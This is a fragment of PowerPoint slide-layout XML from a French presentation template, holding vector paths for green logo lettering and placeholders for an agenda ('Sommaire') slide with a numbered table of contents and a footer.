                <a:gd name="connsiteY21" fmla="*/ 185906 h 43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9788" h="434553">
                  <a:moveTo>
                    <a:pt x="308470" y="82560"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65557"/>
                    <a:pt x="290134" y="50373"/>
                    <a:pt x="276275" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261844" y="25381"/>
                    <a:pt x="245042" y="15669"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206562" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="281061"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185073" y="281320"/>
                    <a:pt x="206342" y="277872"/>
                    <a:pt x="226554" y="270869"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="244747" y="264677"/>
                    <a:pt x="261540" y="254967"/>
                    <a:pt x="275989" y="242294"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289743" y="229907"/>
                    <a:pt x="300716" y="214747"/>
                    <a:pt x="308184" y="197813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316061" y="179803"/>
                    <a:pt x="319985" y="160317"/>
                    <a:pt x="319709" y="140663"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320147" y="120715"/>
                    <a:pt x="316318" y="100905"/>
                    <a:pt x="308470" y="82560"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185906"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198951" y="198081"/>
                    <a:pt x="181492" y="204382"/>
                    <a:pt x="163689" y="203337"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="89204" y="203337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89204" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163689" y="78274"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181549" y="77133"/>
                    <a:pt x="199113" y="83285"/>
                    <a:pt x="212362" y="95324"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224002" y="107283"/>
                    <a:pt x="230203" y="123511"/>
                    <a:pt x="229507" y="140186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230136" y="157178"/>
                    <a:pt x="223811" y="173692"/>
                    <a:pt x="211981" y="185906"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>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BB82A00A-B815-4A3F-984B-32D2A0D7EE28}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7796116" y="3205474"/>
              <a:ext cx="320413" cy="450200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY0" fmla="*/ 244245 h 450200"/>
                <a:gd name="connsiteX1" fmla="*/ 212648 w 320413"/>
                <a:gd name="connsiteY1" fmla="*/ 192620 h 450200"/>
                <a:gd name="connsiteX2" fmla="*/ 163213 w 320413"/>
                <a:gd name="connsiteY2" fmla="*/ 170807 h 450200"/>
                <a:gd name="connsiteX3" fmla="*/ 125685 w 320413"/>
                <a:gd name="connsiteY3" fmla="*/ 149757 h 450200"/>
                <a:gd name="connsiteX4" fmla="*/ 112540 w 320413"/>
                <a:gd name="connsiteY4" fmla="*/ 121182 h 450200"/>
                <a:gd name="connsiteX5" fmla="*/ 128352 w 320413"/>
                <a:gd name="connsiteY5" fmla="*/ 89273 h 450200"/>
                <a:gd name="connsiteX6" fmla="*/ 166452 w 320413"/>
                <a:gd name="connsiteY6" fmla="*/ 78986 h 450200"/>
                <a:gd name="connsiteX7" fmla="*/ 213505 w 320413"/>
                <a:gd name="connsiteY7" fmla="*/ 92226 h 450200"/>
                <a:gd name="connsiteX8" fmla="*/ 249414 w 320413"/>
                <a:gd name="connsiteY8" fmla="*/ 129088 h 450200"/>
                <a:gd name="connsiteX9" fmla="*/ 309994 w 320413"/>
                <a:gd name="connsiteY9" fmla="*/ 82320 h 450200"/>
                <a:gd name="connsiteX10" fmla="*/ 254367 w 320413"/>
                <a:gd name="connsiteY10" fmla="*/ 23360 h 450200"/>
                <a:gd name="connsiteX11" fmla="*/ 165785 w 320413"/>
                <a:gd name="connsiteY11" fmla="*/ 24 h 450200"/>
                <a:gd name="connsiteX12" fmla="*/ 109111 w 320413"/>
                <a:gd name="connsiteY12" fmla="*/ 8501 h 450200"/>
                <a:gd name="connsiteX13" fmla="*/ 63391 w 320413"/>
                <a:gd name="connsiteY13" fmla="*/ 32885 h 450200"/>
                <a:gd name="connsiteX14" fmla="*/ 33102 w 320413"/>
                <a:gd name="connsiteY14" fmla="*/ 71747 h 450200"/>
                <a:gd name="connsiteX15" fmla="*/ 21957 w 320413"/>
                <a:gd name="connsiteY15" fmla="*/ 122801 h 450200"/>
                <a:gd name="connsiteX16" fmla="*/ 29863 w 320413"/>
                <a:gd name="connsiteY16" fmla="*/ 164235 h 450200"/>
                <a:gd name="connsiteX17" fmla="*/ 51580 w 320413"/>
                <a:gd name="connsiteY17" fmla="*/ 197858 h 450200"/>
                <a:gd name="connsiteX18" fmla="*/ 84822 w 320413"/>
                <a:gd name="connsiteY18" fmla="*/ 225195 h 450200"/>
                <a:gd name="connsiteX19" fmla="*/ 127304 w 320413"/>
                <a:gd name="connsiteY19" fmla="*/ 247960 h 450200"/>
                <a:gd name="connsiteX20" fmla="*/ 173405 w 320413"/>
                <a:gd name="connsiteY20" fmla="*/ 269010 h 450200"/>
                <a:gd name="connsiteX21" fmla="*/ 214267 w 320413"/>
                <a:gd name="connsiteY21" fmla="*/ 291394 h 450200"/>
                <a:gd name="connsiteX22" fmla="*/ 228745 w 320413"/>
                <a:gd name="connsiteY22" fmla="*/ 323017 h 450200"/>
                <a:gd name="connsiteX23" fmla="*/ 212553 w 320413"/>
                <a:gd name="connsiteY23" fmla="*/ 358545 h 450200"/>
                <a:gd name="connsiteX24" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY24" fmla="*/ 371118 h 450200"/>
                <a:gd name="connsiteX25" fmla="*/ 103968 w 320413"/>
                <a:gd name="connsiteY25" fmla="*/ 352068 h 450200"/>
                <a:gd name="connsiteX26" fmla="*/ 80536 w 320413"/>
                <a:gd name="connsiteY26" fmla="*/ 331970 h 450200"/>
                <a:gd name="connsiteX27" fmla="*/ 61486 w 320413"/>
                <a:gd name="connsiteY27" fmla="*/ 308253 h 450200"/>
                <a:gd name="connsiteX28" fmla="*/ -45 w 320413"/>
                <a:gd name="connsiteY28" fmla="*/ 353878 h 450200"/>
                <a:gd name="connsiteX29" fmla="*/ 168166 w 320413"/>
                <a:gd name="connsiteY29" fmla="*/ 450080 h 450200"/>
                <a:gd name="connsiteX30" fmla="*/ 228079 w 320413"/>
                <a:gd name="connsiteY30" fmla="*/ 441222 h 450200"/>
                <a:gd name="connsiteX31" fmla="*/ 276180 w 320413"/>
                <a:gd name="connsiteY31" fmla="*/ 415505 h 450200"/>
                <a:gd name="connsiteX32" fmla="*/ 308470 w 320413"/>
                <a:gd name="connsiteY32" fmla="*/ 374357 h 450200"/>
                <a:gd name="connsiteX33" fmla="*/ 320280 w 320413"/>
                <a:gd name="connsiteY33" fmla="*/ 319683 h 450200"/>
                <a:gd name="connsiteX34" fmla="*/ 291991 w 320413"/>
                <a:gd name="connsiteY34" fmla="*/ 244245 h 4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0413" h="450200">
                  <a:moveTo>
                    <a:pt x="291991" y="244245"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="268969" y="222276"/>
                    <a:pt x="242061" y="204771"/>
                    <a:pt x="212648" y="192620"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="163213" y="170807"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150021" y="165086"/>
                    <a:pt x="137448" y="158033"/>
                    <a:pt x="125685" y="149757"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116884" y="142963"/>
                    <a:pt x="111969" y="132286"/>
                    <a:pt x="112540" y="121182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="111635" y="108465"/>
                    <a:pt x="117684" y="96255"/>
                    <a:pt x="128352" y="89273"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139763" y="82180"/>
                    <a:pt x="153021" y="78603"/>
                    <a:pt x="166452" y="78986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183101" y="78626"/>
                    <a:pt x="199484" y="83236"/>
                    <a:pt x="213505" y="92226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227869" y="101926"/>
                    <a:pt x="240099" y="114472"/>
                    <a:pt x="249414" y="129088"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="309994" y="82320"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="296887" y="58168"/>
                    <a:pt x="277713" y="37846"/>
                    <a:pt x="254367" y="23360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227697" y="7217"/>
                    <a:pt x="196941" y="-885"/>
                    <a:pt x="165785" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146573" y="-105"/>
                    <a:pt x="127447" y="2755"/>
                    <a:pt x="109111" y="8501"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92433" y="13580"/>
                    <a:pt x="76898" y="21863"/>
                    <a:pt x="63391" y="32885"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50685" y="43576"/>
                    <a:pt x="40369" y="56816"/>
                    <a:pt x="33102" y="71747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25491" y="87677"/>
                    <a:pt x="21681" y="105152"/>
                    <a:pt x="21957" y="122801"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21710" y="137010"/>
                    <a:pt x="24396" y="151116"/>
                    <a:pt x="29863" y="164235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35140" y="176596"/>
                    <a:pt x="42484" y="187967"/>
                    <a:pt x="51580" y="197858"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61372" y="208437"/>
                    <a:pt x="72554" y="217634"/>
                    <a:pt x="84822" y="225195"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="98481" y="233679"/>
                    <a:pt x="112674" y="241283"/>
                    <a:pt x="127304" y="247960"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="173405" y="269010"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="187721" y="275118"/>
                    <a:pt x="201408" y="282615"/>
                    <a:pt x="214267" y="291394"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224106" y="298830"/>
                    <a:pt x="229545" y="310713"/>
                    <a:pt x="228745" y="323017"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229469" y="336792"/>
                    <a:pt x="223421" y="350052"/>
                    <a:pt x="212553" y="358545"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199551" y="367517"/>
                    <a:pt x="183940" y="371937"/>
                    <a:pt x="168166" y="371118"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="145306" y="371594"/>
                    <a:pt x="122865" y="364935"/>
                    <a:pt x="103968" y="352068"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="95500" y="346174"/>
                    <a:pt x="87651" y="339441"/>
                    <a:pt x="80536" y="331970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73573" y="324575"/>
                    <a:pt x="67201" y="316645"/>
                    <a:pt x="61486" y="308253"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="353878"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="33578" y="414924"/>
                    <a:pt x="98500" y="452054"/>
                    <a:pt x="168166" y="450080"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188473" y="450259"/>
                    <a:pt x="208686" y="447270"/>
                    <a:pt x="228079" y="441222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245614" y="435818"/>
                    <a:pt x="261949" y="427087"/>
                    <a:pt x="276180" y="415505"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289829" y="404323"/>
                    <a:pt x="300859" y="390275"/>
                    <a:pt x="308470" y="374357"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316499" y="357264"/>
                    <a:pt x="320538" y="338567"/>
                    <a:pt x="320280" y="319683"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="321433" y="291747"/>
                    <a:pt x="311232" y="264534"/>
                    <a:pt x="291991" y="244245"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00CE7C"/>
            </a:solidFill>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3566354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A)">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A8BE665-E252-4CA5-BC25-17F716CF5E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522782" y="709442"/>
            <a:ext cx="3047947" cy="518795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000" cap="all" baseline="0">
                <a:latin typeface="Gilroy ExtraBold" panose="00000900000000000000" pitchFamily="2" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sommaire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADA7B848-13D9-4229-ABEE-5A53975F373F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522782" y="248864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7" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C581A0C-6864-4E71-A7F7-FEB8D5BBCC3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472300" y="198168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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84006FA8-55DE-44C1-8213-76D793446779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968811" y="248864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9" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A08150-F706-448E-9C1A-DB03C67210B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946917" y="2001100"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10A40D52-C650-4149-A732-B67351CAC988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8551959" y="1986576"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCA01BE2-12AB-4601-B1A8-AE9E72D41B88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8687869" y="248864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 name="Espace réservé du numéro de diapositive 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B815A916-1CFE-42B0-8C0D-4B6E641805CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du pied de page 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930EFF25-5A3D-40CE-8381-F57A0145360A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Titre de la présentation</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Image 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0131761E-9CA0-4419-AA9C-ADAC96BE8B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22" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019FC0BA-3649-4603-ACE8-FA7C135A6FE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522782" y="445968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3" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18F1A8AE-86B3-42C3-84CB-CA78A87D67DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1472300" y="395272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4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9047DAE-CE5B-4DCD-A5F8-8EB880DB90E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4968811" y="445968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5" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C5B4C8-6192-48DE-A3ED-D75497C4399A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4946917" y="3972140"/>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5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DC7C18D-4F6E-4D57-B6A1-F0887C1EC188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8551959" y="3957616"/>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6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Espace réservé du texte 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C23DD7A-568C-49A6-93AD-93E48EE0F30D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8687869" y="445968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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Groupe 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD826CD2-D558-4576-8529-8B98662B327C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12327910" y="4868227"/>
            <a:ext cx="1885826" cy="1989773"/>
            <a:chOff x="511520" y="2588002"/>
            <a:chExt cx="1885826" cy="1989773"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Freeform 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62D14BAB-A2E4-4DCF-A503-80983940F801}"/>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3" name="Rectangle 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C9B5CCB-DA1D-402D-AAEE-9CB35A905B88}"/>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2508811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genda (B)">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle : avec coin arrondi 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A7DC338-F68D-4183-AC8B-16E339522601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="693601" y="862555"/>
            <a:ext cx="10788485" cy="5133131"/>
          </a:xfrm>
          <a:prstGeom prst="round1Rect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4507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2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8BE665-E252-4CA5-BC25-17F716CF5E6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1709420" y="1537804"/>
            <a:ext cx="3047947" cy="518795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4000">
